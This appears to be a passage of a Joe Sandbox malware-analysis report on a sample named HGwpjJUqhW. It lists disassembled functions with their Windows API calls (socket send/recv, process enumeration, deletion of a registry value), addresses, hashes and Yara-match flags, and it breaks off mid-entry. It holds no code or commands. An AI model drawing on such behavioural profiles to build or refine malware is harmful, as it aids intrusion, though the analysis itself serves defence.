                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            • Opcode ID: 7e76c0441e0359fcf5e04af8da2207a90bfd010fb1154cd4ecca9da7cd5ee078
                                                                                                                            • Instruction ID: 10a2dff530d492b7c8c617f2064d7830cd736d4f283c60d68cb454594a2de3ec
                                                                                                                            • Opcode Fuzzy Hash: 7e76c0441e0359fcf5e04af8da2207a90bfd010fb1154cd4ecca9da7cd5ee078
                                                                                                                            • Instruction Fuzzy Hash: 7E015E39D427519BE722EB66A50479AF7A0EF06B20F180109E814AB784CF349541CB9A
                                                                                                                            Function 02C348C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C348EC
                                                                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C348F9
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C34914
                                                                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C3491D
                                                                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C3492E
                                                                                                                              • Part of subcall function 02C33F60: GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                              • Part of subcall function 02C33F60: send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                              • Part of subcall function 02C33F60: SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                              • Part of subcall function 02C33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                              • Part of subcall function 02C33F60: WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                              • Part of subcall function 02C33F60: shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                              • Part of subcall function 02C33F60: closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1019945655-0
                                                                                                                            • Opcode ID: 777a610e9a7af1c1f0c80598e45b04d6b8454e918fb1d20011e22722b6fb06ff
                                                                                                                            • Instruction ID: 6269f2717e117b52e6538ebe2ff168ffbd47311edcb71509ae5242a605a72817
                                                                                                                            • Opcode Fuzzy Hash: 777a610e9a7af1c1f0c80598e45b04d6b8454e918fb1d20011e22722b6fb06ff
                                                                                                                            • Instruction Fuzzy Hash: E4F096362046045BC224EBA9DC84E4BF3E9EFD9760B104F09E26987690CB75F801CBE0
                                                                                                                            Function 03629BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 03629BD2
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BE3
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BF8
                                                                                                                            • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03629B7B), ref: 03629C04
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C15
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4268643673-0
                                                                                                                            • Opcode ID: d5aa0e3abee292bc9b48ad796cec553d065971137ffcdd7f299b7e22d4a32df6
                                                                                                                            • Instruction ID: 01c8560fdda29cb956d9c54829363c109e18d3b3aa2a00d3e3725c855d6c5131
                                                                                                                            • Opcode Fuzzy Hash: d5aa0e3abee292bc9b48ad796cec553d065971137ffcdd7f299b7e22d4a32df6
                                                                                                                            • Instruction Fuzzy Hash: 66010CB5E00714DFCB04EFAA9990416BBF4BA8A715335A5AEF1188A20AC372C403CF95
                                                                                                                            Function 036248D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 036248E1
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 036248EC
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 036248F9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 03624914
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0362491D
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 0362492E
                                                                                                                              • Part of subcall function 03623F60: GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                              • Part of subcall function 03623F60: send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                              • Part of subcall function 03623F60: SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1019945655-0
                                                                                                                            • Opcode ID: c323fdfa23d9c07a91e18cb5d248105b0a2b7f610779fe5a534d5c1d18244fb6
                                                                                                                            • Instruction ID: 051f9688292ea5f617b7e4182f037b54663bc62a36a94622e7b923757b0c8de7
                                                                                                                            • Opcode Fuzzy Hash: c323fdfa23d9c07a91e18cb5d248105b0a2b7f610779fe5a534d5c1d18244fb6
                                                                                                                            • Instruction Fuzzy Hash: 36F0907A2046145BC220EBA9DC84C4BF3E9EFC8720B254B09F26583398CB71E801CFA4
                                                                                                                            Function 03623300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03623311
                                                                                                                            • Sleep.KERNEL32(00000258), ref: 0362331E
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03623326
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03623332
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0362333A
                                                                                                                            • Sleep.KERNEL32(0000012C), ref: 0362334B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3137405945-0
                                                                                                                            • Opcode ID: 6ed473f93e6312056217b82ca7f7b011d665b7c2601e69d364240a0d24b506d9
                                                                                                                            • Instruction ID: 055a4584165024709de7a5b3e46d37c52f33815d0037661fb8bcf9e895b1678a
                                                                                                                            • Opcode Fuzzy Hash: 6ed473f93e6312056217b82ca7f7b011d665b7c2601e69d364240a0d24b506d9
                                                                                                                            • Instruction Fuzzy Hash: C8F082762047046BD710ABA9DC84D57F3E8AF89334B204B09F321832D8CAB1E801CB64
                                                                                                                            Function 02C43A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 02C43A63
                                                                                                                              • Part of subcall function 02C439BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C439F4
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 02C43A7A
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 02C43A88
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction ID: 29f53475c15a3e065016b1c13adf33219c4d4b506a2d5b25594de23309eb568c
                                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction Fuzzy Hash: 1001E43144114ABBDF12AF91CC45EEB7E6AFF88354F204055BD5816120DB36D9B1EBA1
                                                                                                                            Function 0364095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0364096E
                                                                                                                              • Part of subcall function 036408C9: ___BuildCatchObjectHelper.LIBCMT ref: 036408FF
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 03640985
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 03640993
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                            • Instruction ID: cd7dfadee752ca90d4d5c282e8d27193c2c955ca47f5098baa1bb3b005d0cc74
                                                                                                                            • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                            • Instruction Fuzzy Hash: EE01F676801219BBEF12AF51CD44EAABF6AEF09350F048018FE5819220D736D9B1DBA4
                                                                                                                            Function 0362B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0362B800
                                                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0362B810
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0362B81B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                            • String ID: Console$IpDatespecial
                                                                                                                            • API String ID: 849931509-1840232981
                                                                                                                            • Opcode ID: 0d47c30e5307ee0d0e5c1ecb5e219dd90a6f5b7b02d938f45d8ae9db996b8c11
                                                                                                                            • Instruction ID: 318320c5b1dad7821d5201cd4313a6b42cd1b9da05edba7eaf29b1fbb6b0b695
                                                                                                                            • Opcode Fuzzy Hash: 0d47c30e5307ee0d0e5c1ecb5e219dd90a6f5b7b02d938f45d8ae9db996b8c11
                                                                                                                            • Instruction Fuzzy Hash: 3AE08676B45240AFD324A6A0AC5FFA97794F78CB11F10491DF785A1145C652E440C665
                                                                                                                            Function 0362B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,95401134), ref: 0362B9DA
                                                                                                                            • _memset.LIBCMT ref: 0362B9FB
                                                                                                                            • _memset.LIBCMT ref: 0362BA4B
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0362BA65
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0362BAB7
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2416807333-0
                                                                                                                            • Opcode ID: addda7873b0edb68152d43bcabc0ad9a29b243fb36194565db9ea1779045b45f
                                                                                                                            • Instruction ID: fcd2247551a3d3226f435f41abcab9c98bc9522ecc0219caf6d61bcc9dd54c43
                                                                                                                            • Opcode Fuzzy Hash: addda7873b0edb68152d43bcabc0ad9a29b243fb36194565db9ea1779045b45f
                                                                                                                            • Instruction Fuzzy Hash: D3411771A00A25AFE710DF60CC85FAABFB8EF05710F068298E9159B3C0E7B59940CF95
                                                                                                                            Function 02C33CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 02C33CBF
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33CFA
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 02C33D45
                                                                                                                            • WSAGetLastError.WS2_32(?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33D7B
                                                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,02C3399F,?,?,00000000,000000FF,00000000), ref: 02C33DA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$recv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 316788870-0
                                                                                                                            • Opcode ID: f7f2b4ec7c5526a2b83ea0fbcf803a2da0a6415b360af238ac72a7bcbb0f6036
                                                                                                                            • Instruction ID: c34ad139c6fcbd992f79b119d88675dfe57e3fbedf5a176de00071f5f7693592
                                                                                                                            • Opcode Fuzzy Hash: f7f2b4ec7c5526a2b83ea0fbcf803a2da0a6415b360af238ac72a7bcbb0f6036
                                                                                                                            • Instruction Fuzzy Hash: EB310B766142408FEB65DF68E8C876A37A9FB84324F500EA6EE05CF285D775D880CBD1
                                                                                                                            Function 03623CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,00000598,00000000), ref: 03623CBF
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623CFA
                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 03623D45
                                                                                                                            • WSAGetLastError.WS2_32(?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623D7B
                                                                                                                            • WSASetLastError.WS2_32(0000000D,?,?,0362399F,?,?,00000000,000000FF,00000000), ref: 03623DA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$recv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 316788870-0
                                                                                                                            • Opcode ID: 68a488411af9130fb830f5e7f9af599b21fb540ee184ef914c86cbcd06287a7f
                                                                                                                            • Instruction ID: 13ab5617299c9a26bd6cda7996737298c08fa0da89e51edb803f8b4d5ce2d192
                                                                                                                            • Opcode Fuzzy Hash: 68a488411af9130fb830f5e7f9af599b21fb540ee184ef914c86cbcd06287a7f
                                                                                                                            • Instruction Fuzzy Hash: 8031C47AB046208BEB14DF68D4C8B6A7F69FB85320F26056AED05CB389D735D8818E51
                                                                                                                            Function 02C3E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02C3E5E5
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            • _free.LIBCMT ref: 02C3E5F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: 7759bcfdb2ea5db167d5025b9fcfe7278409d5205cb8fadd6f266d5ddde6e614
                                                                                                                            • Instruction ID: 9bafd670ca6b1b5266c96b45ed255581e19bd295ad76c4b2f586ddc13b62aad5
                                                                                                                            • Opcode Fuzzy Hash: 7759bcfdb2ea5db167d5025b9fcfe7278409d5205cb8fadd6f266d5ddde6e614
                                                                                                                            • Instruction Fuzzy Hash: D411C673944619ABCB232B74AC08B9A37F6AF803A0B100D25F859AB181EB34C9509F94
                                                                                                                            Function 03630EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 03630EF9
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 03630F0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: f55b0f24eb0d05121d1125aaf7995a881b2d6313ca86af68d047e5051f6fbbcf
                                                                                                                            • Instruction ID: 7ade2a239ebec06e6c23da069395526cd17630a10f7cb009220a10119a1989bb
                                                                                                                            • Opcode Fuzzy Hash: f55b0f24eb0d05121d1125aaf7995a881b2d6313ca86af68d047e5051f6fbbcf
                                                                                                                            • Instruction Fuzzy Hash: CB110D36808B297FCB21FF75B90465A3FA99F422A0B25042DFC4B9F244DB34C5418B98
                                                                                                                            Function 02C32BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C32BFF
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C32C15
                                                                                                                            • TranslateMessage.USER32(?), ref: 02C32C24
                                                                                                                            • DispatchMessageW.USER32(?), ref: 02C32C2A
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C32C38
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2015114452-0
                                                                                                                            • Opcode ID: 8ee86384ccf4161be50fb6a3545bbe4660208715e977ed50cc4244dd9b69a2f4
                                                                                                                            • Instruction ID: 0cbf1139ae1832a60f49f2a946339fc448ecd9b5f2a7619aa93601092116bd66
                                                                                                                            • Opcode Fuzzy Hash: 8ee86384ccf4161be50fb6a3545bbe4660208715e977ed50cc4244dd9b69a2f4
                                                                                                                            • Instruction Fuzzy Hash: 9A01A976A8030977EE219AA59C41FFB73ACAB54B50F504E11FF05EA0C4DAA0E901C7B5
                                                                                                                            Function 03622C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03622C3F
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03622C55
                                                                                                                            • TranslateMessage.USER32(?), ref: 03622C64
                                                                                                                            • DispatchMessageW.USER32(?), ref: 03622C6A
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03622C78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2015114452-0
                                                                                                                            • Opcode ID: 1236c3a41a4ddb4c2242ee981dbf9cdb10031b0e1a04c6fefe9e72bc2d12c4a3
                                                                                                                            • Instruction ID: 2204bfff4d095b3a3141f0ee513a2c0b6077f5d0d931a8ad21cb5629f7f84d57
                                                                                                                            • Opcode Fuzzy Hash: 1236c3a41a4ddb4c2242ee981dbf9cdb10031b0e1a04c6fefe9e72bc2d12c4a3
                                                                                                                            • Instruction Fuzzy Hash: C701D632F5031EB6E750E6A49D91FFB776CAB45B20F114A01FB00EA1C8D6A1A4018BA9
                                                                                                                            Function 02C34B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C34B63
